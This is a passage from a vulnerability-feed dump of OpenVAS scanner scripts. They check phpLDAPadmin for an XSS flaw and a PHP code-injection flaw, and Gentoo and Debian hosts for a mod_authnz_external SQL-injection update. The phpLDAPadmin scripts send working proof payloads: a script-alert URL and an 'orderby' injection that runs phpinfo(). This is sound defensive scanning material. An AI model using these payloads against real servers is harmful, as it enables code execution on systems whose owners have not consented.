value:\"http://phpldapadmin.git.sourceforge.net/git/gitweb.cgi?p=phpldapadmin/phpldapadmin;a=commit;h=64668e882b8866fae0fa1b25375d1a2f3b4672e2\");\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/46551\");\n script_xref(name:\"URL\", value:\"http://xforce.iss.net/xforce/xfdb/70918\");\n script_xref(name:\"URL\", value:\"http://openwall.com/lists/oss-security/2011/10/24/9\");\n script_xref(name:\"URL\", value:\"https://bugzilla.redhat.com/show_bug.cgi?id=748538\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote attackers to insert arbitrary HTML\n and script code, which will be executed in a user's browser session in the context of an affected site.\");\n\n script_tag(name:\"affected\", value:\"phpLDAPadmin versions 1.2.0 through 1.2.1.1\");\n\n script_tag(name:\"insight\", value:\"The flaw is due to improper validation of user-supplied input appended\n to the URL in cmd.php (when 'cmd' is set to '_debug'), which allows attackers to execute arbitrary HTML\n and script code in a user's browser session in the context of an affected site.\");\n\n script_tag(name:\"solution\", value:\"Updates are available. Please see the references for more info.\");\n\n script_tag(name:\"summary\", value:\"This host is running phpLDAPadmin and is prone to cross site\n scripting vulnerability.\");\n\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\nCPE = \"cpe:/a:phpldapadmin:phpldapadmin\";\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\ninclude(\"host_details.inc\");\n\nif(!port = get_app_port(cpe:CPE)) exit(0);\nif(!dir = get_app_location(cpe:CPE, port:port)) exit(0);\nif(dir == \"/\") dir = \"\";\n\nreq = http_get(item:string(dir, \"/index.php\"), port:port);\nres = http_keepalive_send_recv(port:port, data:req);\n\ncookie = eregmatch(pattern:\"Set-Cookie: ([^;]*);\", string:res);\nif(isnull(cookie[1])) {\n exit(0);\n}\ncookie = cookie[1];\n\nurl = \"/cmd.php?cmd=_debug&<script>alert('OV-XSS-Attack-Test')</script>\";\nreq = http_get(item:dir + url, port:port);\nreq = string(chomp(req), '\\r\\nCookie: ', cookie, '\\r\\n\\r\\n');\n\nres = http_keepalive_send_recv(port:port, data:req);\n\nif(res =~ \"^HTTP/1\\.[01] 200\" && \"<script>alert('OV-XSS-Attack-Test')</script>\" >< res){\n report = http_report_vuln_url(port:port, url:url);\n security_message(port:port, data:report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2017-07-02T21:13:41", "description": "This host is running phpLDAPadmin and is prone to cross site\n scripting vulnerability.", "cvss3": {}, "published": "2011-11-03T00:00:00", "type": "openvas", "title": "phpLDAPadmin '_debug' Cross Site Scripting Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-4074"], "modified": "2017-03-30T00:00:00", "id": "OPENVAS:802265", "href": "http://plugins.openvas.org/nasl.php?oid=802265", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_phpldapadmin_debug_xss_vuln.nasl 5793 2017-03-30 13:40:15Z cfi $\n#\n# phpLDAPadmin '_debug' Cross Site Scripting Vulnerability\n#\n# Authors:\n# Sooraj KS <kssooraj@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_impact = \"Successful exploitation will allow remote attackers to insert arbitrary HTML\n and script code, which will be executed in a user's browser session in the\n context of an affected site.\n Impact Level: Application\";\ntag_affected = \"phpLDAPadmin versions 1.2.0 through 1.2.1.1\";\ntag_insight = \"The flaw is due to improper validation of user-supplied input appended\n to the URL in cmd.php (when 'cmd' is set to '_debug'), which allows attackers\n to execute arbitrary HTML and script code in a user's browser session in the\n context of an affected site.\";\ntag_solution = \"Apply patch from below link,\n http://phpldapadmin.git.sourceforge.net/git/gitweb.cgi?p=phpldapadmin/phpldapadmin;a=commit;h=64668e882b8866fae0fa1b25375d1a2f3b4672e2\";\ntag_summary = \"This host is running phpLDAPadmin and is prone to cross site\n scripting vulnerability.\";\n\nif(description)\n{\n script_id(802265);\n script_version(\"$Revision: 5793 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-03-30 15:40:15 +0200 (Thu, 30 Mar 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-11-03 12:22:48 +0100 (Thu, 03 Nov 2011)\");\n script_cve_id(\"CVE-2011-4074\");\n script_bugtraq_id(50331);\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_name(\"phpLDAPadmin '_debug' Cross Site Scripting Vulnerability\");\n script_xref(name : \"URL\" , value : \"http://secunia.com/advisories/46551\");\n script_xref(name : \"URL\" , value : \"http://xforce.iss.net/xforce/xfdb/70918\");\n script_xref(name : \"URL\" , value : \"http://openwall.com/lists/oss-security/2011/10/24/9\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=748538\");\n\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_category(ACT_ATTACK);\n script_copyright(\"Copyright (C) 2011 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"phpldapadmin_detect.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_mandatory_keys(\"phpldapadmin/installed\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"version_func.inc\");\ninclude(\"http_keepalive.inc\");\n\nport = get_http_port(default:80);\n\nif(!can_host_php(port:port)){\n exit(0);\n}\n\n## Get phpLDAPadmin Directory\nif(! dir = get_dir_from_kb(port:port,app:\"phpldapadmin\")){\n exit(0);\n}\n\nif( dir == \"/\" ) dir = \"\";\n\nreq = http_get(item:string(dir, \"/index.php\"), port:port);\nres = http_keepalive_send_recv(port:port, data:req);\n\n## Get Session ID\ncookie = eregmatch(pattern:\"Set-Cookie: ([^;]*);\", string:res);\nif(isnull(cookie[1])) {\n exit(0);\n}\ncookie = cookie[1];\n\n## Construct attack request\nurl = \"/cmd.php?cmd=_debug&<script>alert('OV-XSS-Attack-Test')</script>\";\nreq = http_get(item:dir + url, port:port);\nreq = string(chomp(req), '\\r\\nCookie: ', cookie, '\\r\\n\\r\\n');\n\n## Send request and receive the response\nres = http_keepalive_send_recv(port:port, data:req);\n\n## Confirm exploit worked by checking the response\nif(res =~ \"HTTP/1\\.. 200\" && \"<script>alert('OV-XSS-Attack-Test')</script>\" >< res){\n security_message(port);\n}\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2019-05-29T18:39:58", "description": "phpLDAPadmin is prone to a remote PHP code-injection vulnerability.", "cvss3": {}, "published": "2011-10-25T00:00:00", "type": "openvas", "title": "phpLDAPadmin 'functions.php' Remote PHP Code Injection Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-4075"], "modified": "2018-10-10T00:00:00", "id": "OPENVAS:1361412562310103314", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310103314", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_phpldapadmin_50331.nasl 11826 2018-10-10 14:38:27Z cfischer $\n#\n# phpLDAPadmin 'functions.php' Remote PHP Code Injection Vulnerability\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.103314\");\n script_version(\"$Revision: 11826 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-10 16:38:27 +0200 (Wed, 10 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2011-10-25 16:57:43 +0200 (Tue, 25 Oct 2011)\");\n script_bugtraq_id(50331);\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_cve_id(\"CVE-2011-4075\");\n script_name(\"phpLDAPadmin 'functions.php' Remote PHP Code Injection Vulnerability\");\n script_category(ACT_ATTACK);\n script_family(\"Web application abuses\");\n script_copyright(\"This script is Copyright (C) 2011 Greenbone Networks GmbH\");\n script_dependencies(\"phpldapadmin_detect.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_mandatory_keys(\"phpldapadmin/installed\");\n\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/bid/50331\");\n script_xref(name:\"URL\", value:\"http://phpldapadmin.sourceforge.net/\");\n\n script_tag(name:\"summary\", value:\"phpLDAPadmin is prone to a remote PHP code-injection vulnerability.\");\n\n script_tag(name:\"impact\", value:\"An attacker can exploit this issue to inject and execute arbitrary PHP\n code in the context of the affected application. This may facilitate a compromise of the application and\n the underlying system. Other attacks are also possible.\");\n\n script_tag(name:\"affected\", value:\"phpLDAPadmin versions 1.2.0 through 1.2.1.1 are vulnerable.\");\n\n script_tag(name:\"solution\", value:\"Updates are available.\");\n\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\nCPE = \"cpe:/a:phpldapadmin:phpldapadmin\";\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\ninclude(\"host_details.inc\");\n\nif(!port = get_app_port(cpe:CPE)) exit(0);\nif(!dir = get_app_location(cpe:CPE, port:port)) exit(0);\nif(dir == \"/\") dir = \"\";\n\nurl = string(dir, \"/index.php\");\nreq = http_get(item:url, port:port);\nbuf = http_keepalive_send_recv(port:port, data:req, bodyonly:FALSE);\nif( buf == NULL ) exit(0);\n\nsession_id = eregmatch(pattern:\"Set-Cookie: ([^;]*);\",string:buf);\nif(isnull(session_id[1]))exit(0);\nsess = session_id[1];\n\nhost = http_host_name(port:port);\npayload = \"cmd=query_engine&query=none&search=1&orderby=foo));}}phpinfo();die;/*\";\n\nreq = string(\n\t \"POST \", dir , \"/cmd.php HTTP/1.1\\r\\n\",\n \"Host: \", host,\"\\r\\n\",\n \"Cookie: \", sess, \"\\r\\n\",\n\t \"Content-Length: \", strlen(payload),\"\\r\\n\",\n\t \"Content-Type: application/x-www-form-urlencoded\\r\\n\",\n\t \"Connection: close\\r\\n\",\n\t \"\\r\\n\",\n\t payload\n\t );\nres = http_send_recv(port:port, data:req);\n\nif(\"<title>phpinfo()\" >< res) {\n security_message(port:port);\n exit(0);\n}\n\nexit(99);", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2017-09-04T14:19:55", "description": "phpLDAPadmin is prone to a remote PHP code-injection vulnerability.\n\nAn attacker can exploit this issue to inject and execute arbitrary PHP\ncode in the context of the affected application. This may facilitate a\ncompromise of the application and the underlying system; other attacks\nare also possible.\n\nphpLDAPadmin versions 1.2.0 through 1.2.1.1 are vulnerable.", "cvss3": {}, "published": "2011-10-25T00:00:00", "type": "openvas", "title": "phpLDAPadmin 'functions.php' Remote PHP Code Injection Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-4075"], "modified": "2017-08-28T00:00:00", "id": "OPENVAS:103314", "href": "http://plugins.openvas.org/nasl.php?oid=103314", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_phpldapadmin_50331.nasl 7015 2017-08-28 11:51:24Z teissa $\n#\n# phpLDAPadmin 'functions.php' Remote PHP Code Injection Vulnerability\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_summary = \"phpLDAPadmin is prone to a remote PHP code-injection vulnerability.\n\nAn attacker can exploit this issue to inject and execute arbitrary PHP\ncode in the context of the affected application. This may facilitate a\ncompromise of the application and the underlying system; other attacks\nare also possible.\n\nphpLDAPadmin versions 1.2.0 through 1.2.1.1 are vulnerable.\";\n\n\nif (description)\n{\n script_id(103314);\n script_version(\"$Revision: 7015 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-08-28 13:51:24 +0200 (Mon, 28 Aug 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-10-25 16:57:43 +0200 (Tue, 25 Oct 2011)\");\n script_bugtraq_id(50331);\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_cve_id(\"CVE-2011-4075\");\n script_name(\"phpLDAPadmin 'functions.php' Remote PHP Code Injection Vulnerability\");\n\n script_xref(name : \"URL\" , value : \"http://www.securityfocus.com/bid/50331\");\n script_xref(name : \"URL\" , value : \"http://phpldapadmin.sourceforge.net/\");\n\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_category(ACT_ATTACK);\n script_family(\"Web application abuses\");\n script_copyright(\"This script is Copyright (C) 2011 Greenbone Networks GmbH\");\n script_dependencies(\"phpldapadmin_detect.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_mandatory_keys(\"phpldapadmin/installed\");\n script_tag(name : \"summary\" , value : tag_summary);\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"host_details.inc\");\ninclude(\"http_keepalive.inc\");\ninclude(\"version_func.inc\");\n \nport = get_http_port(default:80);\nif(!can_host_php(port:port))exit(0);\n\nif(! dir = get_dir_from_kb(port:port,app:\"phpldapadmin\"))exit(0);\n\nurl = string(dir, \"/index.php\");\nreq = http_get(item:url, port:port);\nbuf = http_keepalive_send_recv(port:port, data:req, bodyonly:FALSE);\nif( buf == NULL ) exit(0);\n\nsession_id = eregmatch(pattern:\"Set-Cookie: ([^;]*);\",string:buf);\nif(isnull(session_id[1]))exit(0);\nsess = session_id[1];\n\nhost = get_host_name();\npayload = \"cmd=query_engine&query=none&search=1&orderby=foo));}}phpinfo();die;/*\";\n\nreq = string(\n\t \"POST \", dir , \"/cmd.php HTTP/1.1\\r\\n\",\n \"Host: \", host,\"\\r\\n\",\n \"Cookie: \", sess, \"\\r\\n\",\n\t \"Content-Length: \", strlen(payload),\"\\r\\n\",\n\t \"Content-Type: application/x-www-form-urlencoded\\r\\n\",\n\t \"Connection: close\\r\\n\",\n\t \"\\r\\n\",\n\t payload\n\t );\n\nres = http_send_recv(port:port, data:req);\n\nif(\"<title>phpinfo()\" >< res) {\n security_message(port:port);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-05-29T18:38:38", "description": "The remote host is missing updates announced in\nadvisory GLSA 201110-23.", "cvss3": {}, "published": "2012-02-12T00:00:00", "type": "openvas", "title": "Gentoo Security Advisory GLSA 201110-23 (mod_authnz_external)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-2688"], "modified": "2018-10-12T00:00:00", "id": "OPENVAS:136141256231070786", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231070786", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: glsa_201110_23.nasl 11859 2018-10-12 08:53:01Z cfischer $\n#\n# Auto generated from Gentoo's XML based advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.70786\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_cve_id(\"CVE-2011-2688\");\n script_version(\"$Revision: 11859 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-12 10:53:01 +0200 (Fri, 12 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-02-12 10:04:40 -0500 (Sun, 12 Feb 2012)\");\n script_name(\"Gentoo Security Advisory GLSA 201110-23 (mod_authnz_external)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Gentoo Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_tag(name:\"insight\", value:\"An input sanitation flaw in mod_authnz_external allows remote\n attacker to conduct SQL injection.\");\n script_tag(name:\"solution\", value:\"All Apache mod_authnz_external users should upgrade to the latest\n version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=www-apache/mod_authnz_external-3.2.6'\");\n\n script_xref(name:\"URL\", value:\"http://www.securityspace.com/smysecure/catid.html?in=GLSA%20201110-23\");\n script_xref(name:\"URL\", value:\"http://bugs.gentoo.org/show_bug.cgi?id=386165\");\n script_tag(name:\"summary\", value:\"The remote host is missing updates announced in\nadvisory GLSA 201110-23.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"pkg-lib-gentoo.inc\");\ninclude(\"revisions-lib.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = ispkgvuln(pkg:\"www-apache/mod_authnz_external\", unaffected: make_list(\"ge 3.2.6\"), vulnerable: make_list(\"lt 3.2.6\"))) != NULL ) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2017-07-24T12:50:33", "description": "The remote host is missing updates announced in\nadvisory GLSA 201110-23.", "cvss3": {}, "published": "2012-02-12T00:00:00", "type": "openvas", "title": "Gentoo Security Advisory GLSA 201110-23 (mod_authnz_external)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-2688"], "modified": "2017-07-07T00:00:00", "id": "OPENVAS:70786", "href": "http://plugins.openvas.org/nasl.php?oid=70786", "sourceData": "#\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from Gentoo's XML based advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"An input sanitation flaw in mod_authnz_external allows remote\n attacker to conduct SQL injection.\";\ntag_solution = \"All Apache mod_authnz_external users should upgrade to the latest\n version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=www-apache/mod_authnz_external-3.2.6'\n \n\nhttp://www.securityspace.com/smysecure/catid.html?in=GLSA%20201110-23\nhttp://bugs.gentoo.org/show_bug.cgi?id=386165\";\ntag_summary = \"The remote host is missing updates announced in\nadvisory GLSA 201110-23.\";\n\n \n \nif(description)\n{\n script_id(70786);\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_cve_id(\"CVE-2011-2688\");\n script_version(\"$Revision: 6593 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 11:18:14 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2012-02-12 10:04:40 -0500 (Sun, 12 Feb 2012)\");\n script_name(\"Gentoo Security Advisory GLSA 201110-23 (mod_authnz_external)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Gentoo Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-gentoo.inc\");\nres = \"\";\nreport = \"\";\nif((res = ispkgvuln(pkg:\"www-apache/mod_authnz_external\", unaffected: make_list(\"ge 3.2.6\"), vulnerable: make_list(\"lt 3.2.6\"))) != NULL ) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-24T12:55:35", "description": "The remote host is missing an update to libapache2-mod-authnz-external\nannounced via advisory DSA 2279-1.", "cvss3": {}, "published": "2011-08-03T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 2279-1 (libapache2-mod-authnz-external)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-2688"], "modified": "2017-07-07T00:00:00", "id": "OPENVAS:69988", "href": "http://plugins.openvas.org/nasl.php?oid=69988", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_2279_1.nasl 6613 2017-07-07 12:08:40Z cfischer $\n# Description: Auto-generated from advisory DSA 2279-1 (libapache2-mod-authnz-external)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2011 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"It was discovered that libapache2-mod-authnz-external, an apache\nauthentication module, is prone to an SQL injection via the $user\nparameter.\n\n\nFor the stable distribution (squeeze), this problem has been fixed in\nversion 3.2.4-2+squeeze1.\n\nThe oldstable distribution (lenny) does not contain\nlibapache2-mod-authnz-external\n\nFor the testing distribution (wheezy), this problem will be fixed soon.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 3.2.4-2.1.\n\n\nWe recommend that you upgrade your libapache2-mod-authnz-external packages.\";\ntag_summary = \"The remote host is missing an update to libapache2-mod-authnz-external\nannounced via advisory DSA 2279-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%202279-1\";\n\n\nif(description)\n{\n script_id(69988);\n script_version(\"$Revision: 6613 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:08:40 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-08-03 04:36:20 +0200 (Wed, 03 Aug 2011)\");\n script_cve_id(\"CVE-2011-2688\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Debian Security Advisory DSA 2279-1 (libapache2-mod-authnz-external)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2011 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"libapache2-mod-authnz-external\", ver:\"3.2.4-2+squeeze1\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-05-29T18:39:47", "description": "The remote host is missing an update to libapache2-mod-authnz-external\nannounced via advisory DSA 2279-1.", "cvss3": {}, "published": "2011-08-03T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 2279-1 (libapache2-mod-authnz-external)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-2688"], "modified": "2019-03-18T00:00:00", "id": "OPENVAS:136141256231069988", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231069988", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_2279_1.nasl 14275 2019-03-18 14:39:45Z cfischer $\n# Description: Auto-generated from advisory DSA 2279-1 (libapache2-mod-authnz-external)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2011 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.69988\");\n script_version(\"$Revision: 14275 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-18 15:39:45 +0100 (Mon, 18 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2011-08-03 04:36:20 +0200 (Wed, 03 Aug 2011)\");\n script_cve_id(\"CVE-2011-2688\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Debian Security Advisory DSA 2279-1 (libapache2-mod-authnz-external)\");\n 